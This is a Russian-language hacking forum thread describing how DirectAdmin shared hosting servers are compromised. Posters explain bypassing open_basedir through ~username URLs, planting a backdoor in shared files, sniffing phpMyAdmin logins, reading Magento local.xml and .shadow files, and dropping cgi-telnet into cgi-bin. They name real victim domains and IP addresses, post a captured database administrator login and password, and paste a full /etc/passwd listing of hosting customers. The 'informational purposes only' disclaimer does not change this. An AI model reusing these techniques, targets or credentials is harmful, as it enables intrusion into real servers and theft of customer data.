Касяки DirectAdmin'a

Не важно как у меня оказался шел, сама суть!

На скриншоте видем что, у нас нет выполнения консоли, базе дир закрыт и куча отключенных полезныхфункций.
хочу заметить что в директ админе архитектура папок строится так:
/home/ofirwine/domains/ofirwinery.co.il/public_html/ - где ofirwine это нашь юзер(юзерская папка).



в директ админе есть такая характерность/возможность оброщаться на прямую через IP к папке пользователя т.е в нашем случае это будет так:
http://80.179.148.242/~ofirwine/

а теперь посмотрим что нам покажет шелле в Sec. Info:


В данном примере изменился open_base_dir на практике и disable_function тоже отключается в некоторых моментах, зависит от внимательности админа.

переходим в открывшийся нам путь: /var/www/html/
мне повезло есть файлы расшареные, внедряем в них бегдор и перезаливаемся с IP обратившись на прямую, получаем шелл с текущими правами:


в пхпмиадмин я встроил сниф, спустя какоето время собрался лог где попался рутовый юзер:
http://80.179.148.242/phpmyadmin/err.txt - da_admin:fAWj4_oq

доступ к phpmyadmin как через домен:
http://www.ofirwinery.co.il/phpmyadmin/
так и через IP:
http://80.179.148.242/phpmyadmin/

ну а дальше в БД палим домены и заливаемся дальше по порядку....




root access for BD
https://www.hostingblog.co.il/phpmyadmin/ da_admin:fAWj4_oq

User for you hosting, access for all sites

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0perator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sb...
saslauth:x:499:76:"Saslauthd user":/var/empty/sasl...
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
sshd:x:74:74rivilege-separated SSH:/var/empty/ss...
ntp:x:38:38::/etc/ntp:/sbin/nologin
named:x:25:25:Named:/var/named:/sbin/nologin
apache:x:498:500::/var/www:/bin/false
diradmin:x:497:497::/usr/local/directadmin:/bin/fa...
mysql:x:496:496:MySQL server:/var/lib/mysql:/bin/f...
majordomo:x:495:2::/etc/virtual/majordomo:/bin/fal...
webapps:x:500:501::/var/www/html:/bin/false
dovecot:x:494:494::/home/dovecot:/bin/false
admin:x:501:502::/home/admin:/bin/bash
avih:x:502:504::/home/avih:/bin/bash
aattia:x:503:505::/home/aattia:/bin/bash
dannyg:x:504:506::/home/dannyg:/bin/bash
spdsupport:x:505:507::/home/spdsupport:/bin/bash
exploitest:x:507:509::/home/exploitest:/bin/false
dbus:x:81:81:System message bus:/:/sbin/nologin
fadidate:x:508:510::/home/fadidate:/bin/false
sysblogt:x:509:511::/home/sysblogt:/bin/false
linguior:x:510:512::/home/linguior:/bin/false
hayokrac:x:511:513::/home/hayokrac:/bin/false
abicoil:x:512:514::/home/abicoil:/bin/false
nofzuqim:x:515:517::/home/nofzuqim:/bin/false
itaorgil:x:517:519::/home/itaorgil:/bin/false
pitzoico:x:518:520::/home/pitzoico:/bin/false
outlooko:x:519:521::/home/outlooko:/bin/false
lobizcoi:x:520:522::/home/lobizcoi:/bin/false
tzioname:x:521:523::/home/tzioname:/bin/false
shairudi:x:522:524::/home/shairudi:/bin/false
shearimt:x:524:526::/home/shearimt:/bin/false
vetpetco:x:525:527::/home/vetpetco:/bin/false
ashdodne:x:526:528::/home/ashdodne:/bin/false
miriamte:x:527:529::/home/miriamte:/bin/false
dfusimpr:x:528:530::/home/dfusimpr:/bin/false
eynatcoi:x:529:531::/home/eynatcoi:/bin/false
hostingblg:x:530:532::/home/hostingblg:/bin/false
aefcoil:x:531:533::/home/aefcoil:/bin/false
innovati:x:532:534::/home/innovati:/bin/false
shimitem:x:533:535::/home/shimitem:/bin/false
electron:x:534:536::/home/electron:/bin/false
heskemor:x:535:537::/home/heskemor:/bin/false
chiropra:x:536:538::/home/chiropra:/bin/false
wwwtempu:x:537:539::/home/wwwtempu:/bin/false
bernywww:x:538:540::/home/bernywww:/bin/false
mabasirc:x:539:541::/home/mabasirc:/bin/false
tomaticc:x:541:543::/home/tomaticc:/bin/false
idgucoil:x:543:545::/home/idgucoil:/bin/false
jdmusicc:x:544:546::/home/jdmusicc:/bin/false
rewoodco:x:545:547::/home/rewoodco:/bin/false
leebaorg:x:546:548::/home/leebaorg:/bin/false
magnetic:x:547:549::/home/magnetic:/bin/false
composto:x:549:551::/home/composto:/bin/false
haderech:x:551:553::/home/haderech:/bin/false
zipporic:x:554:556::/home/zipporic:/bin/false
bookidsc:x:557:559::/home/bookidsc:/bin/false
ofirwine:x:560:562::/home/ofirwine:/bin/false
shaonico:x:562:564::/home/shaonico:/bin/false
priorgan:x:567:569::/home/priorgan:/bin/false
ebikedep:x:569:571::/home/ebikedep:/bin/false
tempurl1:x:571:573::/home/tempurl1:/bin/false
adicohen:x:572:574::/home/adicohen:/bin/false
banandac:x:574:576::/home/banandac:/bin/false
hairatem:x:575:577::/home/hairatem:/bin/false
gigicoil:x:577:580::/home/gigicoil:/bin/false
dgimarke:x:578:581::/home/dgimarke:/bin/false
inemuseu:x:579:582::/home/inemuseu:/bin/false
pybizcoi:x:581:584::/home/pybizcoi:/bin/false
newmeita:x:582:585::/home/newmeita:/bin/false
lansmoto:x:584:587::/home/lansmoto:/bin/false
iireccoi:x:585:588::/home/iireccoi:/bin/false
digimaco:x:586:589::/home/digimaco:/bin/false
coil123:x:590:593::/home/coil123:/bin/false
yolotech:x:592:595::/home/yolotech:/bin/false
asiorenc:x:593:596::/home/asiorenc:/bin/false
danceres:x:595:598::/home/danceres:/bin/false
imabacoi:x:596:599::/home/imabacoi:/bin/false
karinara:x:597:600::/home/karinara:/bin/false
dikursin:x:598:601::/home/dikursin:/bin/false
oldgames:x:599:602::/home/oldgames:/bin/false
ticoutem:x:602:605::/home/ticoutem:/bin/false
yaronrla:x:604:607::/home/yaronrla:/bin/false
bestcard:x:605:608::/home/bestcard:/bin/false
davidcom:x:606:609::/home/davidcom:/bin/false
medisonp:x:607:610::/home/medisonp:/bin/false
gufcoil:x:608:611::/home/gufcoil:/bin/false
cleanshi:x:609:612::/home/cleanshi:/bin/false
talktohe:x:610:613::/home/talktohe:/bin/false
etsbacoi:x:611:614::/home/etsbacoi:/bin/false
hadassin:x:612:615::/home/hadassin:/bin/false
nirslav1:x:613:616::/home/nirslav1:/bin/false
ilanmare:x:614:617::/home/ilanmare:/bin/false
dfactory:x:617:620::/home/dfactory:/bin/false
hvaitami:x:618:621::/home/hvaitami:/bin/false
ogentemp:x:619:622::/home/ogentemp:/bin/false
valtechc:x:620:623::/home/valtechc:/bin/false
saraweis:x:622:625::/home/saraweis:/bin/false
excelvba:x:623:626::/home/excelvba:/bin/false
beckmedi:x:624:627::/home/beckmedi:/bin/false
boobjobc:x:625:628::/home/boobjobc:/bin/false
dezionco:x:626:629::/home/dezionco:/bin/false
bronstei:x:630:633::/home/bronstei:/bin/false
liatbeau:x:632:635::/home/liatbeau:/bin/false


P.S: Владельцы сервака, своевременно были осведомлены о данной баги и своевременно ее устранили. Данная статья несет в себе характер, чисто в ознакомительных целях.

 

KIR@PRO

Вот какраз при дефолте и работает, тут есть еще одна фишка, рабочию площадку на досуге найду... покажу...

P.S: там суть в связке magento+directadmin, свободное чтение при дефолтных настройках "app/etc/local.xml" где хронятся данные от БД и путь к админке, примерный путь выглядит так... "http://127.0.0.1/~USERNAME/app/etc/local.xml" сервак с дефолтными настройками htaccess'ом не обременен

 

вот пример на Magento+DirectAdmin

жертва: https://www.smitsarnhem.nl/
смотрим пхпинфо или ищем раскрытие путей
https://www.smitsarnhem.nl/phpinfo.php
_SERVER["DOCUMENT_ROOT"] /home/smitsarn/domains/smitsarnhem.nl/private_html
т.е smitsarn является нашим юзером, идем дальше...

http://194.247.31.208/~smitsarn/app/etc/local.xml читаем конфиг

phpmyadmin лежит по дефолту всегда:

http://194.247.31.208/phpMyAdmin/
https://www.smitsarnhem.nl/phpMyAdmin/

а дальше уже дело техник....

еще касяк, нам полностью доступна пака /home/%USERNAME%/ где /home/%USERNAME%/.shadow лежит пасс от аккаунта %USERNAME%

 

он весит на 2222/2223 порт по дефолту http://www.smitsarnhem.nl:2222/

 

Конфиги читаются в тех файлах которые не интерпретируются как PHP, в твоем случае стоит джумла, и там конфиг в PHP файле....

https://202.150.222.205/~admin/
http://27.254.148.144/~tuxedo/

Смотри внимательней 3 пост https://forum.antichat.ru/threads/441101/#post-3990017, рабочий пример

 

покопай в сторону CPanel тоже, там такой же косяк с путями ~, но по дефолту там по конфигам апача стоит deny на .ht/sh(хз как тебе удалось прочитать), получается на каждый сервер индивидуальный случай, зависит от кривизны настроек... и ещё есть красивый косячёк, под правами юзера пишем в cgi-bin тот же cgi-telnet, ставим права, через ~ заходим по ипу и обходим настройки серванта....